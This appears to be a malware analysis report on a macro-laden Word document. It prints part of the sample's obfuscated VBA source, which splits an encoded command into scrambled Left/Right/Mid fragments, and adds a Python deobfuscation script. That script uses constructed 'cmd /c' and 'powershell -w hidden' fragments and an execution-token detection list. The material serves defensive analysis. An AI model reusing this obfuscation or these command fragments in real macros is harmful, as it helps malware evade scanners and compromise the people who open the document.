Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb1a67049f2f65ce…

MALICIOUS

Office (OLE)

Size: 77.5 KB
Created: 2017-10-12 06:45:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: 0fc095f4868450c4339b700ac49c32a0
SHA-1: 2af8df8ffa31ced85d0ff3f5bbb19b54501dd7b5
SHA-256: bb1a67049f2f65ce40d68a111becaf0f772754c024013b8d8a869d59472af9eb
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document carrying a VBA macro project. The project exposes an AutoOpen entry point, so the code runs as soon as a user opens the document with macros enabled (T1204.002, T1059.005), and it contains a call to Shell(), which hands a command line to the operating system. ClamAV's signature name, Doc.Macro.DollarShell-6346616-0, points at the same Shell() pattern. The recovered source shows the obfuscation technique: one decoded buffer, psXJQmrtA(hPAWIiQKW), is cut into dozens of fragments with Right(Left(...)), Mid(...) and Left(Right(..., Len(...) - n)) and the fragments are reassembled in a different order, which keeps every meaningful string out of the source that keyword scanners see. The argument to the decoder is itself assembled from fragments that include the literal "coMments", consistent with the encoded payload being stored in a document property, although the property lookup is not in the recovered portion. AutoOpen plus Shell() is the classic macro-downloader pattern, but Shell() by itself only proves command execution; whether the command downloads and runs a second stage cannot be confirmed from this static result, because the decoder and the final Shell() argument are not in the portion of the extracted source reproduced on this page.

Heuristics 7

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace identifier that Office writes into any document containing drawing or shape markup; it is never fetched by Office and is not an indicator on its own.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5424 bytes
SHA-256: 05a32246251544f34e52e4f6a179b867d5ba1181c918d47f58aab778e87eecce
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub MBnlXtPvZ()
hPAWIiQKW = "" + CoofBXsW + HwGhTqAY + IdQBq + vBbEb + "coMments" + CoofBXsW + HwGhTqAY + IdQBq + vBbEb + aplCNw + BotSS + LXPUKGIb + hCZBzj + QwYtr
iakAYOknu = Right(Left((psXJQmrtA(hPAWIiQKW)), 2589), 88)
VVorrXd = Right(Left((psXJQmrtA(hPAWIiQKW)), 1583), 143)
DvPpS = Mid((psXJQmrtA(hPAWIiQKW)), 8512, 143)
GWUJXYjICs = Mid((psXJQmrtA(hPAWIiQKW)), 3798, 163)
sBkAwII = Mid((psXJQmrtA(hPAWIiQKW)), 9642, 40)
HrQjkzbm = Right(Left((psXJQmrtA(hPAWIiQKW)), 8230), 73)
ioZiQZzswmf = Right(Left((psXJQmrtA(hPAWIiQKW)), 8956), 85)
bNFCTvRhKMR = Mid((psXJQmrtA(hPAWIiQKW)), 11722, 49)
EdmbIVrzO = Right(Left((psXJQmrtA(hPAWIiQKW)), 14172), 114)
WTaAPLk = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 6402), 75)
roSfuHr = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1643), 50)
XbHjkU = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 10959), 125)
ViKzC = Mid((psXJQmrtA(hPAWIiQKW)), 11151, 45)
lfzURRwcaf = Mid((psXJQmrtA(hPAWIiQKW)), 668, 94)
KHjAiwi = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 10759), 61)
MqiGfJqFhUp = Mid((psXJQmrtA(hPAWIiQKW)), 3165, 195)
tPHWbwZzh = Mid((psXJQmrtA(hPAWIiQKW)), 4153, 193)
EKwoijwTWmZ = Mid((psXJQmrtA(hPAWIiQKW)), 2847, 71)
OlIIWsL = Mid((psXJQmrtA(hPAWIiQKW)), 2178, 64)
iNRsHWmQAf = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1102), 82)
BVKBbAVWFt = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 7402), 67)
qIqoRdop = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 1260), 176)
flXlYbj = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 13534), 192)
uAfMPzHurp = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 4777), 25)
kssBwjzzX = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 5980), 171)
mmpZdqbtpAH = Mid((psXJQmrtA(hPAWIiQKW)), 12549, 11)
LwarKiwA = Right(Left((psXJQmrtA(hPAWIiQKW)), 3153), 82)
vsfjavjFP = Right(Left((psXJQmrtA(hPAWIiQKW)), 7962), 39)
taZYd = Right(Left((psXJQmrtA(hPAWIiQKW)), 5729), 186)
vlidSTq = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14351), 62)
Gpouz = Right(Left((psXJQmrtA(hPAWIiQKW)), 6323), 59)
ujwGB = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 7009), 113)
usXYR = Mid((psXJQmrtA(hPAWIiQKW)), 5301, 192)
SjijE = Mid((psXJQmrtA(hPAWIiQKW)), 10306, 183)
RaMtYqcPaJB = Right(Left((psXJQmrtA(hPAWIiQKW)), 7719), 109)
fsfzOzi = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 13063), 76)
uuYjEoIJNu = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 12354), 165)
cFmNd = Right(Left((psXJQmrtA(hPAWIiQKW)), 2012), 95)
iROWmBVaB = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14663), 197)
UslWqXAS = iakAYOknu + VVorrXd + DvPpS + GWUJXYjICs + sBkAwII + HrQjkzbm + ioZiQZzswmf + bNFCTvRhKMR + EdmbIVrzO + WTaAPLk + roSfuHr + XbHjkU + ViKzC + lfzURRwcaf + KHjAiwi + MqiGfJqFhUp + tPHWbwZzh + EKwoijwTWmZ + OlIIWsL + iNRsHWmQAf + BVKBbAVWFt + qIqoRdop + flXlYbj + uAfMPzHurp + kssBwjzzX + mmpZdqbtpAH + LwarKiwA + vsfjavjFP + taZYd + vlidSTq + Gpouz + ujwGB + usXYR + SjijE + RaMtYqcPaJB + fsfzOzi + uuYjEoIJNu + cFmNd + iROWmBVaB
SoIwiSIBMz = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 15187), 2)
NCazoBUlS = Right(Left((psXJQmrtA(hPAWIiQKW)), 4982), 165)
YszTJl = Right(Left((psXJQmrtA(hPAWIiQKW)), 14049), 13)
IEsQZz = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 14420), 138)
TKujab = Mid((psXJQmrtA(hPAWIiQKW)), 9434, 77)
TPYLRvwU = Mid((psXJQmrtA(hPAWIiQKW)), 6556, 81)
jEizzQsl = Mid((psXJQmrtA(hPAWIiQKW)), 4427, 186)
bXXmw = UslWqXAS + SoIwiSIBMz + NCazoBUlS + YszTJl + IEsQZz + TKujab + TPYLRvwU + jEizzQs
... (truncated)
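The extract above shows the string-slicing scheme but not the decoder psXJQmrtA or its output, so the strings it builds cannot be read off the page. The following script is an added example, not code from the report or from the macro's author: it maps each of the three slice shapes used in the sample (Right(Left(B, a), n), Mid(B, a, n) and Left(Right(B, Len(B) - a), n)) to a fixed window into the decoded buffer, evaluates the concatenation lines, and then runs a keyword check of the kind the OLE_VBA_SHELL style heuristics perform over both the raw source and the rebuilt strings. The decoder output BUFFER, the macro lines in SAMPLE_MACRO and the EXEC_TOKENS keyword list are constructed for the example; the analyst would substitute the real decoder output (dumped from a debugger or a re-implementation of psXJQmrtA) and the real macros.bas.

```python
"""Resolve the Left/Right/Mid slice obfuscation used by the extracted macro.

Every fragment assignment in the sample has one of three shapes, and all of
them are fixed windows into one decoded buffer B = psXJQmrtA(hPAWIiQKW):

    Right(Left(B, a), n)              -> B[a-n : a]
    Mid(B, a, n)                      -> B[a-1 : a-1+n]   (VBA Mid is 1-based)
    Left(Right(B, Len(B) - a), n)     -> B[a : a+n]       (Len(B) cancels out)

So once the decoder output is known, the strings can be rebuilt without
running the macro. The decoder psXJQmrtA and its real output are not on the
report page; BUFFER and SAMPLE_MACRO below are constructed for this example.
"""
import re

# Illustrative keyword list, not the report's rule set.
EXEC_TOKENS = re.compile(
    r"\b(shell|wscript\.shell|createobject|powershell|cmd|autoopen|"
    r"document_open|urldownloadtofile|xmlhttp)\b", re.I)

# Concatenation: name = operand + operand + ..., operands are names or "literals".
CONCAT = re.compile(r'^\s*(\w+)\s*=\s*((?:(?:"[^"]*"|\w+)\s*\+\s*)+(?:"[^"]*"|\w+))\s*$')


def slice_window(line, buf_expr):
    """Map one slice assignment to (name, start, length) in 0-based terms, else None."""
    b = re.escape(buf_expr)
    m = re.match(rf"^\s*(\w+)\s*=\s*Right\(Left\({b},\s*(\d+)\),\s*(\d+)\)\s*$", line)
    if m:                                  # Right(Left(B, a), n): last n of the first a
        name, a, n = m.group(1), int(m.group(2)), int(m.group(3))
        start = max(a - n, 0)              # VBA Right() caps n at the string length
        return name, start, a - start
    m = re.match(rf"^\s*(\w+)\s*=\s*Mid\({b},\s*(\d+),\s*(\d+)\)\s*$", line)
    if m:                                  # Mid(B, a, n): n chars from 1-based position a
        return m.group(1), int(m.group(2)) - 1, int(m.group(3))
    m = re.match(rf"^\s*(\w+)\s*=\s*Left\(Right\({b},\s*Len\({b}\)\s*-\s*(\d+)\),\s*(\d+)\)\s*$", line)
    if m:                                  # Left(Right(B, Len(B)-a), n): skip a, take n
        return m.group(1), int(m.group(2)), int(m.group(3))
    return None


def resolve(source, buffer, buf_expr="(psXJQmrtA(hPAWIiQKW))"):
    """Evaluate slice and concatenation assignments against a known decoder output."""
    env = {}
    for line in source.splitlines():
        win = slice_window(line, buf_expr)
        if win:
            name, start, length = win
            env[name] = buffer[start:start + length]
            continue
        m = CONCAT.match(line)
        if m:
            parts = []
            for lit, ident in re.findall(r'"([^"]*)"|(\w+)', m.group(2)):
                # A name never assigned is an Empty Variant, which VBA concatenates as "".
                parts.append(env.get(ident, "") if ident else lit)
            env[m.group(1)] = "".join(parts)
    return env


def scan_tokens(text):
    """The kind of keyword check a Shell()/AutoOpen heuristic performs on source text."""
    return {t.lower() for t in EXEC_TOKENS.findall(text)}


# Constructed stand-in for the decoder output: junk with four useful pieces at
# known 0-based offsets 12, 32, 55 and 77 (total length 90).
BUFFER = ("QWERTYUIOPAS" "cmd /c " "ZXCVBNMKLJHGF" "powershell " "ASDFGHJKLQWE"
          "-w hidden " "MNBVCXZLKJHG" "Start-Sleep 1")

# Constructed macro lines in the sample's style, one of each slice shape.
SAMPLE_MACRO = """\
Sub MBnlXtPvZ()
hPAWIiQKW = "" + CoofBXsW + "coMments" + HwGhTqAY
iakAYOknu = Right(Left((psXJQmrtA(hPAWIiQKW)), 19), 7)
VVorrXd = Mid((psXJQmrtA(hPAWIiQKW)), 33, 11)
DvPpS = Left(Right((psXJQmrtA(hPAWIiQKW)), Len((psXJQmrtA(hPAWIiQKW))) - 55), 10)
GWUJXYjICs = Mid((psXJQmrtA(hPAWIiQKW)), 78, 13)
UslWqXAS = iakAYOknu + VVorrXd + DvPpS + GWUJXYjICs
End Sub
"""

if __name__ == "__main__":
    env = resolve(SAMPLE_MACRO, BUFFER)
    print("decoder argument       :", repr(env["hPAWIiQKW"]))
    print("rebuilt string         :", repr(env["UslWqXAS"]))
    print("tokens in raw source   :", scan_tokens(SAMPLE_MACRO) or "none")
    print("tokens after resolving :", scan_tokens(env["UslWqXAS"]))
```

The point of the last two lines is the one the heuristics list makes implicitly: a keyword scan of the raw source finds nothing in the constructed module, while the same scan over the resolved string finds the command tokens. Because Len(B) cancels out of the Left(Right(...)) form, every window is a constant (start, length) pair that can be computed from the source alone; only the buffer contents require the decoder.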